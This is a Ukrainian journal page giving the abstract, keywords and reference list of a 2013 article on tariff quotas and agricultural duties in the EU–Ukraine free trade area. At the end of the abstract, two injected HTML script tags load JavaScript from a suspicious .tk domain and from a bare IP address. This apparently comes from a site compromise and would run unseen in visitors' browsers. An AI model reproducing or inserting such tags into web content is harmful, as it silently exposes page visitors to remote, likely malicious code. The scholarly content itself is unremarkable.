ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 341.176:[339.92:(061ЄС:(477))]
Зовнішньоекономічні відносини

Тарифні квоти та мита на аграрну продукцію при формуванні зони вільної торгівлі між Європейським Союзом та Україною / Кваша К. С. // Економіка АПК. - 2013. - № 11 - С. 99

Розглянуто визначені шляхом переговорів умови формування поглибленої і всеохоплюючої зони вільної торгівля між Європейським Союзом і Україною. Досліджено рівень тарифного захисту Європейського ринку сільськогосподарської продукції та харчових продуктів, зроблено порівняння середніх ставок мита із діючими в Україні. Наведено тарифні квоти за товарними групами УКТ ЗЕД, за якими надаються пільги при експорті української сільськогосподарської продукції до країн Європейського Союзу. Наведено ставки мита та динаміку їх зменшення у періоді дії угоди про Асоціацію між Європейським Союзом та Україною. Табл.: 6. Рис.: 1. Бібліогр.: 10.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: зона вільної торгівлі ЄС - Україна, тарифні квоти, сільськогосподарська продукція, харчові продукти, експорт, імпорт

Список використаних джерел

  1. Можливості та застереження щодо наслідків уведення в дію положень Угоди про асоціацію між ЄС та Україною: наук. доп. / за ред. акад. НАН України В.М. Гейця, чл.-кор. НАН України Т.О. Осташко, д-ра екон. наук В.О. Точиліна; НАН України, ДУ “Ін-т екон. та прогнозув.” – К., 2013. – 98 с.
  2. Кістерський Леонід. Шляхи та інструменти євроінтеграції / Леонід Кістерський, Олексій Плотніков // Голос України. – 2012. – 23 берез. – С. 5.
  3. Одосій О.В. Розвиток агропродовольчого ринку в умовах формування зони вільної торгівлі між Україною та Європейським Союзом / О.В. Одосій // Економіка АПК. – 2013. – № 8. – С. 121-128.
  4. Оцінка наслідків угоди про вільну торгівлю між ЄС та Україною в рамках проекту ”Підтримка проведення громадських консультацій щодо запровадження зони вільної торгівлі між Україною та Європейським Союзом” [Электронный ресурс]. – Режим доступу: http://wto.in.ua/files/content/articles/fta_eu_impact.pdf
  5. Европейский Союз: факти и комментарии. – 2012. – Вып. 70 [Электронный ресурс]. – Режим доступу: http://www.edcaes.ru.
  6. Филипенко А.С. Экономическая глобализация: источники и результаты / А.С. Филипенко. – Москва: «Экономика», 2010. – С. 512.
  7. Сібекіна А.Ю. Аналіз евентуальних можливостей від членства України в ЗВТ з СНД та ЗВТ+ з ЄС / А.Ю. Сібекіна // Актуальні проблеми міжнародних відносин: Зб. наук. праць. – 2013. – Вип. 113. Ч. ІІ (у двох частинах). – С.273-282.
  8. World Trade Report 2013. Factors shaping the future of world trade [Elecronic source]. – http://www.wto.org/english/res_e/publications_e/wtr13_e.htm.
  9. Угода про асоціацію між Європейським Союзом та його державами- членами, з однієї сторони, та Україною, з іншої сторони [Електронний ресурс]. – Режим доступу:
Читати статтю: 13_11_99-106.pdf